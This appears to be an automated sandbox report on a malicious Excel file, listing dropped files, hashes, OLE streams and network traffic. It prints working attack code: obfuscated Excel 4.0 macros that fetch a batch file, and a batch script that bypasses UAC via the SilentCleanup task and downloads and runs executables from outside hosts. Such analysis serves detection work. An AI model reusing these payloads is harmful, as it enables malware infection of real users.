                                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UF448UGC9HH8NS13TMAN.temp
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):8016
                                                                          Entropy (8bit):3.5854792121295844
                                                                          Encrypted:false
                                                                          SSDEEP:96:chQCsMqUqvsqvJCwoaz8hQCsMqUqvsEHyqvJCworIzkKYxHxf8R/lUVMIu:cydoaz8yFHnorIzk5f8RfIu
                                                                          MD5:E1A490558DC2A2E45566613FE711A4C6
                                                                          SHA1:C05F17A5F88A049EB161809B00FDF2EA080C80B5
                                                                          SHA-256:0F5C20CA884F4DCE8230B5CC286016CE5C360058B3982EE02A251CFCDA1ADAAB
                                                                          SHA-512:8F2E08C34EAB3B978E2CD66B639C2FFB3550D2C05CAD0A151C60B512600CA449EF1A35D50246481F94025CEFE92E8EB197D85A4BBFD498761E95A07516A01977
                                                                          Malicious:false
                                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y0IWL9PP10MD7U9YNNWP.temp
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):8016
                                                                          Entropy (8bit):3.5854792121295844
                                                                          Encrypted:false
                                                                          SSDEEP:96:chQCsMqUqvsqvJCwoaz8hQCsMqUqvsEHyqvJCworIzkKYxHxf8R/lUVMIu:cydoaz8yFHnorIzk5f8RfIu
                                                                          MD5:E1A490558DC2A2E45566613FE711A4C6
                                                                          SHA1:C05F17A5F88A049EB161809B00FDF2EA080C80B5
                                                                          SHA-256:0F5C20CA884F4DCE8230B5CC286016CE5C360058B3982EE02A251CFCDA1ADAAB
                                                                          SHA-512:8F2E08C34EAB3B978E2CD66B639C2FFB3550D2C05CAD0A151C60B512600CA449EF1A35D50246481F94025CEFE92E8EB197D85A4BBFD498761E95A07516A01977
                                                                          Malicious:false
                                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                          C:\Users\user\AppData\Roaming\gUuYfpYBjYgU.exe
                                                                          Process:C:\Users\user\AppData\Roaming\sp.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):4384256
                                                                          Entropy (8bit):7.956312284494714
                                                                          Encrypted:false
                                                                          SSDEEP:98304:9vvfdTU6hTADDLfMOQYRm+VsvX428sUeIEPOSJGe39/3XN:9vXhUYADDLfzQYI9vo2LUtVS0eN/XN
                                                                          MD5:E79F542FB3F5AA6E4400953BE24780DB
                                                                          SHA1:41EE7EE8C663793B354513439E9743A5BFC6A246
                                                                          SHA-256:2DDD796E9B53AB3D7EAF4093529077F637F182A934A851AF24DA8C8F189AEED3
                                                                          SHA-512:5A3D723E2DE4C4978B76C79C44F305C7CAA247D55EF29AB4B9BE8846D2EFA6335DA1BAEE69048909FB8603C1C875F6A59846D95F8F9A80294CD8B71D0790105B
                                                                          Malicious:false
                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...o.._..............0...B...........B.. ....C...@.. .......................@C...........@...................................B.O.....C.0.................... C...................................................... ............... ..H............text.....B.. ....B................. ..`.rsrc...0.....C.......B.............@..@.reloc....... C.......B.............@..B..................B.....H....... ...TO......M...t.....?..........................................0................(....(....o....(....r...p(.....r...p .'...r...ps......%......s....s......o..... ....(.....r9..p .'...r...ps......%......s....s........o..... ....(.....rM..p .'...r...ps........%......s....s........o..... ....(.....*".(.....*...0.............+..*..0..s........( ......s!...}......(.......{....s....}......{.....{.....{....s&...}......{.....{.....{.....{.....{....s....}....*..0...........( .
                                                                          C:\Users\user\AppData\Roaming\sp.exe
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):4384256
                                                                          Entropy (8bit):7.956312284494714
                                                                          Encrypted:false
                                                                          SSDEEP:98304:9vvfdTU6hTADDLfMOQYRm+VsvX428sUeIEPOSJGe39/3XN:9vXhUYADDLfzQYI9vo2LUtVS0eN/XN
                                                                          MD5:E79F542FB3F5AA6E4400953BE24780DB
                                                                          SHA1:41EE7EE8C663793B354513439E9743A5BFC6A246
                                                                          SHA-256:2DDD796E9B53AB3D7EAF4093529077F637F182A934A851AF24DA8C8F189AEED3
                                                                          SHA-512:5A3D723E2DE4C4978B76C79C44F305C7CAA247D55EF29AB4B9BE8846D2EFA6335DA1BAEE69048909FB8603C1C875F6A59846D95F8F9A80294CD8B71D0790105B
                                                                          Malicious:true
                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...o.._..............0...B...........B.. ....C...@.. .......................@C...........@...................................B.O.....C.0.................... C...................................................... ............... ..H............text.....B.. ....B................. ..`.rsrc...0.....C.......B.............@..@.reloc....... C.......B.............@..B..................B.....H....... ...TO......M...t.....?..........................................0................(....(....o....(....r...p(.....r...p .'...r...ps......%......s....s......o..... ....(.....r9..p .'...r...ps......%......s....s........o..... ....(.....rM..p .'...r...ps........%......s....s........o..... ....(.....*".(.....*...0.............+..*..0..s........( ......s!...}......(.......{....s....}......{.....{.....{....s&...}......{.....{.....{.....{.....{....s....}....*..0...........( .
                                                                          C:\Users\user\Desktop\CCDE0000
                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                          File Type:Applesoft BASIC program data, first line number 16
                                                                          Category:dropped
                                                                          Size (bytes):266808
                                                                          Entropy (8bit):7.550002100209944
                                                                          Encrypted:false
                                                                          SSDEEP:6144:nk3hbdlylKsgqopeJBWhZFVE+W2NdwIv9DQokMufSR1f8f3BsgaINVQTB9GccQaE:YFDQxtfSHfmBgWOT3Va4n
                                                                          MD5:336756F5355F20218CC54EE0452E76D6
                                                                          SHA1:A238C602DAD4E5ACAA519DE6D2F7843850EEC0B8
                                                                          SHA-256:3ED958EC85F5D1AD326B3599EDC1B1CDEB4CA3C74CF2E4B5A71600ACB66D38B9
                                                                          SHA-512:342AE87DFFB6C902CCF3F35894BD0BC9F66E4DCAEDAEA55D60FCAB25067FCEB9A787B3F9CED66B9F7B6DACC16745914E6F44E4A48B341B115D270EB1B2B9BCC0
                                                                          Malicious:false
                                                                          Preview: ........g2..........................\.p....user B.....a.........=..............ThisWorkbook....................................=........K^)8.......X.@...........".......................1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1. .................C.o.n.s.o.l.a.s.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6..
                                                                          C:\Users\user\Documents\pd.bat
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                          Category:modified
                                                                          Size (bytes):2342
                                                                          Entropy (8bit):5.4591667854724255
                                                                          Encrypted:false
                                                                          SSDEEP:48:dnjA3U3jbo/7vUU3jbo/7vQU3jbo/7vWhN:dnM3U3w/QU3w/kU3w/o
                                                                          MD5:B4D7DD4D44FB5B5C2A155D7AEC0EC1C3
                                                                          SHA1:C8E993C57AA8D7A873E36F1A60361D96ECEBD7E4
                                                                          SHA-256:FEBAEFB0E0405A1E6633C8D7D7C09C08EFDA0D2752E3B0EEE9E69FD12E41C9BF
                                                                          SHA-512:C06E7EC11224607AF7E2E4FD21580FE410CAE1D653E5272EEBDE8713BBCD49AABF38A0F460489471B6EA4B5771BD426B4676739619BA228B6DFFC8DE901F9247
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: C:\Users\user\Documents\pd.bat, Author: Florian Roth
                                                                          • Rule: JoeSecurity_ObfuscatedPowershell, Description: Yara detected Obfuscated Powershell, Source: C:\Users\user\Documents\pd.bat, Author: Joe Security
                                                                          Preview: mode 18,1..color FE..setlocal..for /f "tokens=4-5 delims=. " %%i in ('ver') do set VERSION=%%i.%%j..if "%version%" == "10.0" ( echo "Windows 10 detected" ..reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke(('ht' + 'tps://rebrand.ly/FBobfu'),($env:appdata)+'\ok.bat');Start-Sleep 2; Start-Process $env:appdata\ok.bat; Start-Sleep 12; (New-Object Net.WebClient).DownloadFile('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;&REM " >nul..timeout /t 2 >nul..schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nul..timeout /t 3 >nul..reg delete "HKCU\Environment" /v "windir" /F..)..if "%version%" == "6.3" ( echo "Windows 8.1 detected" ..reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke(('ht' + 'tps://rebrand.ly/FBobfu'),($env:appdata)+'\ok.ba

                                                                          Static File Info

                                                                          General

                                                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Last Saved By: blobijump, Create Time/Date: Sun Sep 20 22:17:44 2020, Last Saved Time/Date: Sun Jan 3 23:14:32 2021, Security: 1
                                                                          Entropy (8bit):7.7433326027127505
                                                                          TrID:
                                                                          • Microsoft Excel sheet (30009/1) 47.99%
                                                                          • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                          • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                          File name:spetsifikatsiya.xls
                                                                          File size:234496
                                                                          MD5:2e0819723d50d0b6a2e6ffdb33778e40
                                                                          SHA1:329d002fc53f93e92b99dfbc5937412b40fccf93
                                                                          SHA256:04ee61f1184be78db3fd78821306e0b81e6dfaff17f6019d76e69237d6133b6a
                                                                          SHA512:4077093de364439b83c65a62b866021a61ac050834c74691ff5b19b125be3fef703f2e30bdc380d04f8ff32811c4e6c9ca84b444be08f7c940326a0243910048
                                                                          SSDEEP:6144:cnSGiysRchNXHfA1MiWhZFVEld+Dr7rIHtjQA7MOfSRFvkf3ysQaoNVwTpNGc8iy:BNjQaNfS3veyQ2eTXrSB
                                                                          File Content Preview:........................;......................................................................................................................................................................................................................................

                                                                          File Icon

                                                                          Icon Hash:e4eea286a4b4bcb4

                                                                          Static OLE Info

                                                                          General

                                                                          Document Type:OLE
                                                                          Number of OLE Files:1

                                                                          OLE File "spetsifikatsiya.xls"

                                                                          Indicators

                                                                          Has Summary Info:True
                                                                          Application Name:unknown
                                                                          Encrypted Document:False
                                                                          Contains Word Document Stream:False
                                                                          Contains Workbook/Book Stream:True
                                                                          Contains PowerPoint Document Stream:False
                                                                          Contains Visio Document Stream:False
                                                                          Contains ObjectPool Stream:
                                                                          Flash Objects Count:
                                                                          Contains VBA Macros:True

                                                                          Summary

                                                                          Code Page:1252
                                                                          Last Saved By:blobijump
                                                                          Create Time:2020-09-20 21:17:44
                                                                          Last Saved Time:2021-01-03 23:14:32
                                                                          Security:1

                                                                          Document Summary

                                                                          Document Code Page:1252
                                                                          Thumbnail Scaling Desired:False
                                                                          Contains Dirty Links:False
                                                                          Shared Document:False
                                                                          Changed Hyperlinks:False
                                                                          Application Version:1048576

                                                                          Streams

                                                                          Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 276
                                                                          General
                                                                          Stream Path:\x5DocumentSummaryInformation
                                                                          File Type:data
                                                                          Stream Size:276
                                                                          Entropy:3.16930549839
                                                                          Base64 Encoded:False
                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . M a c r o 1 . . . . . . . . . . . . . . . . . . . F e u i l l e s d e c a l c u l . . . . . . . . . . . . . . . . . M a c r o
                                                                          Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 98 00 00 00 02 00 00 00 e4 04 00 00
                                                                          Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 156
                                                                          General
                                                                          Stream Path:\x5SummaryInformation
                                                                          File Type:data
                                                                          Stream Size:156
                                                                          Entropy:3.29938329109
                                                                          Base64 Encoded:False
                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . l . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . L . . . . . . . X . . . . . . . d . . . . . . . . . . . . . . . . . . . b l o b i j u m p . . . @ . . . . L . z . . . . @ . . . . . n 1 & . . . . . . . . . . .
                                                                          Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 08 00 00 00 38 00 00 00 0c 00 00 00 4c 00 00 00 0d 00 00 00 58 00 00 00 13 00 00 00 64 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 0a 00 00 00 62 6c 6f 62 69 6a 75 6d 70 00 00 00 40 00 00 00
                                                                          Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 230144
                                                                          General
                                                                          Stream Path:Workbook
                                                                          File Type:Applesoft BASIC program data, first line number 16
                                                                          Stream Size:230144
                                                                          Entropy:7.77909229259
                                                                          Base64 Encoded:True
                                                                          Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . b l o b i j u m p B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . p ^ ) 8 . . . . . . . X . @ . .
                                                                          Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 09 00 00 62 6c 6f 62 69 6a 75 6d 70 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                          Macro 4.0 Code

                                                                          ;;;;;;;112;;;;;;"=GET.CELL(5;L581)";;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item """"pd""&CHAR(46)&""bat"""" -Destination """"$e`nV:T`EMP"""""")";;;;;;;;;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd""&CHAR(46)&""bat -Force"")";;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd""&CHAR(46)&""bat"")";;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 7;cd """"$e`nV:T`EMP; ./pd""&CHAR(46)&""bat"""""")";;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 (nEw-oB`jecT Ne""&CHAR(116)&CHAR(46)&CHAR(87)&CHAR(101)&""bcLIENt).('Down'+'loadFile').In""&CHAR(118)&""oke('""&CHAR(104)&""ttps://cutt.ly/jjfIQ8u','pd""&CHAR(46)&""bat')"")";;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

                                                                          Network Behavior

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          Timestamp                            Source Port  Dest Port  Source IP        Dest IP
                                                                          Jan 6, 2021 09:57:47.798036098 CET   49167        443        192.168.2.22     172.67.8.238
                                                                          Jan 6, 2021 09:57:47.838144064 CET   443          49167      172.67.8.238     192.168.2.22
                                                                          Jan 6, 2021 09:57:47.838244915 CET   49167        443        192.168.2.22     172.67.8.238
                                                                          Jan 6, 2021 09:57:47.857510090 CET   49167        443        192.168.2.22     172.67.8.238
                                                                          Jan 6, 2021 09:57:47.897645950 CET   443          49167      172.67.8.238     192.168.2.22
                                                                          Jan 6, 2021 09:57:47.900795937 CET   443          49167      172.67.8.238     192.168.2.22
                                                                          Jan 6, 2021 09:57:47.900847912 CET   443          49167      172.67.8.238     192.168.2.22
                                                                          Jan 6, 2021 09:57:47.900882959 CET   443          49167      172.67.8.238     192.168.2.22
                                                                          Jan 6, 2021 09:57:47.900932074 CET   49167        443        192.168.2.22     172.67.8.238
                                                                          Jan 6, 2021 09:57:47.916851997 CET   49167        443        192.168.2.22     172.67.8.238
                                                                          Jan 6, 2021 09:57:47.956836939 CET   443          49167      172.67.8.238     192.168.2.22
                                                                          Jan 6, 2021 09:57:47.957597017 CET   443          49167      172.67.8.238     192.168.2.22
                                                                          Jan 6, 2021 09:57:48.156300068 CET   49167        443        192.168.2.22     172.67.8.238
                                                                          Jan 6, 2021 09:57:49.621814013 CET   49167        443        192.168.2.22     172.67.8.238
                                                                          Jan 6, 2021 09:57:49.661902905 CET   443          49167      172.67.8.238     192.168.2.22
                                                                          Jan 6, 2021 09:57:49.784332037 CET   443          49167      172.67.8.238     192.168.2.22
                                                                          Jan 6, 2021 09:57:49.784360886 CET   443          49167      172.67.8.238     192.168.2.22
                                                                          Jan 6, 2021 09:57:49.786777020 CET   49167        443        192.168.2.22     172.67.8.238
                                                                          Jan 6, 2021 09:57:49.791007996 CET   49169        80         192.168.2.22     37.46.150.139
                                                                          Jan 6, 2021 09:57:49.838094950 CET   80           49169      37.46.150.139    192.168.2.22
                                                                          Jan 6, 2021 09:57:49.843275070 CET   49169        80         192.168.2.22     37.46.150.139
                                                                          Jan 6, 2021 09:57:49.843473911 CET   49169        80         192.168.2.22     37.46.150.139
                                                                          Jan 6, 2021 09:57:49.893141031 CET   80           49169      37.46.150.139    192.168.2.22
                                                                          Jan 6, 2021 09:57:49.893182039 CET   80           49169      37.46.150.139    192.168.2.22
                                                                          Jan 6, 2021 09:57:49.893393993 CET   49169        80         192.168.2.22     37.46.150.139
                                                                          Jan 6, 2021 09:57:50.380357027 CET   49169        80         192.168.2.22     37.46.150.139
                                                                          Jan 6, 2021 09:57:50.380446911 CET   49167        443        192.168.2.22     172.67.8.238
                                                                          Jan 6, 2021 09:57:57.553771019 CET   49170        80         192.168.2.22     195.191.149.103
                                                                          Jan 6, 2021 09:57:57.625721931 CET   80           49170      195.191.149.103  192.168.2.22
                                                                          Jan 6, 2021 09:57:57.625876904 CET   49170        80         192.168.2.22     195.191.149.103
                                                                          Jan 6, 2021 09:57:57.626811028 CET   49170        80         192.168.2.22     195.191.149.103
                                                                          Jan 6, 2021 09:57:57.698713064 CET   80           49170      195.191.149.103  192.168.2.22
                                                                          Jan 6, 2021 09:57:57.699496031 CET   80           49170      195.191.149.103  192.168.2.22
                                                                          Jan 6, 2021 09:57:57.699543953 CET   80           49170      195.191.149.103  192.168.2.22
                                                                          Jan 6, 2021 09:57:57.699599028 CET   80           49170      195.191.149.103  192.168.2.22
                                                                          Jan 6, 2021 09:57:57.699639082 CET   80           49170      195.191.149.103  192.168.2.22
                                                                          Jan 6, 2021 09:57:57.699683905 CET   49170        80         192.168.2.22     195.191.149.103
                                                                          Jan 6, 2021 09:57:57.699695110 CET   80           49170      195.191.149.103  192.168.2.22
                                                                          Jan 6, 2021 09:57:57.699745893 CET   80           49170      195.191.149.103  192.168.2.22
                                                                          Jan 6, 2021 09:57:57.699799061 CET   49170        80         192.168.2.22     195.191.149.103
                                                                          Jan 6, 2021 09:57:57.699803114 CET   80           49170      195.191.149.103  192.168.2.22
                                                                          Jan 6, 2021 09:57:57.699841976 CET   80           49170      195.191.149.103  192.168.2.22
                                                                          Jan 6, 2021 09:57:57.699883938 CET   80           49170      195.191.149.103  192.168.2.22
                                                                          Jan 6, 2021 09:57:57.699898958 CET   49170        80         192.168.2.22     195.191.149.103
                                                                          Jan 6, 2021 09:57:57.699940920 CET   80           49170      195.191.149.103  192.168.2.22
                                                                          Jan 6, 2021 09:57:57.700409889 CET   49170        80         192.168.2.22     195.191.149.103
                                                                          Jan 6, 2021 09:57:57.772084951 CET   80           49170      195.191.149.103  192.168.2.22
                                                                          Jan 6, 2021 09:57:57.772150993 CET   80           49170      195.191.149.103  192.168.2.22
                                                                          Jan 6, 2021 09:57:57.772195101 CET   80           49170      195.191.149.103  192.168.2.22
                                                                          Jan 6, 2021 09:57:57.772232056 CET   80           49170      195.191.149.103  192.168.2.22
                                                                          Jan 6, 2021 09:57:57.772269964 CET   80           49170      195.191.149.103  192.168.2.22
                                                                          Jan 6, 2021 09:57:57.772295952 CET   49170        80         192.168.2.22     195.191.149.103
                                                                          Jan 6, 2021 09:57:57.772310019 CET   80           49170      195.191.149.103  192.168.2.22
                                                                          Jan 6, 2021 09:57:57.772330046 CET   49170        80         192.168.2.22     195.191.149.103
                                                                          Jan 6, 2021 09:57:57.772347927 CET   80           49170      195.191.149.103  192.168.2.22
                                                                          Jan 6, 2021 09:57:57.772387028 CET   80           49170      195.191.149.103  192.168.2.22
                                                                          Jan 6, 2021 09:57:57.772423029 CET   49170        80         192.168.2.22     195.191.149.103
                                                                          Jan 6, 2021 09:57:57.772423029 CET   80           49170      195.191.149.103  192.168.2.22
                                                                          Jan 6, 2021 09:57:57.772470951 CET   80           49170      195.191.149.103  192.168.2.22
                                                                          Jan 6, 2021 09:57:57.772511959 CET   80           49170      195.191.149.103  192.168.2.22
                                                                          Jan 6, 2021 09:57:57.772548914 CET   80           49170      195.191.149.103  192.168.2.22
                                                                          Jan 6, 2021 09:57:57.772551060 CET   49170        80         192.168.2.22     195.191.149.103
                                                                          Jan 6, 2021 09:57:57.772587061 CET   80           49170      195.191.149.103  192.168.2.22
                                                                          Jan 6, 2021 09:57:57.772627115 CET   80           49170      195.191.149.103  192.168.2.22
                                                                          Jan 6, 2021 09:57:57.772659063 CET   49170        80         192.168.2.22     195.191.149.103
                                                                          Jan 6, 2021 09:57:57.772664070 CET   80           49170      195.191.149.103  192.168.2.22
                                                                          Jan 6, 2021 09:57:57.772701979 CET   80           49170      195.191.149.103  192.168.2.22
                                                                          Jan 6, 2021 09:57:57.772739887 CET   80           49170      195.191.149.103  192.168.2.22
                                                                          Jan 6, 2021 09:57:57.772775888 CET   49170        80         192.168.2.22     195.191.149.103
                                                                          Jan 6, 2021 09:57:57.772789955 CET   80           49170      195.191.149.103  192.168.2.22
                                                                          Jan 6, 2021 09:57:57.772833109 CET   80           49170      195.191.149.103  192.168.2.22
                                                                          Jan 6, 2021 09:57:57.772865057 CET   49170        80         192.168.2.22     195.191.149.103
                                                                          Jan 6, 2021 09:57:57.772870064 CET   80           49170      195.191.149.103  192.168.2.22
                                                                          Jan 6, 2021 09:57:57.772941113 CET   49170        80         192.168.2.22     195.191.149.103
                                                                          Jan 6, 2021 09:57:57.844769001 CET   80           49170      195.191.149.103  192.168.2.22
                                                                          Jan 6, 2021 09:57:57.844820976 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.844857931 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.844897032 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.844933987 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.844980955 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.845024109 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.845060110 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.845098972 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.845136881 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.845172882 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.845211029 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.845248938 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.845297098 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.845338106 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.845375061 CET8049170195.191.149.103192.168.2.22
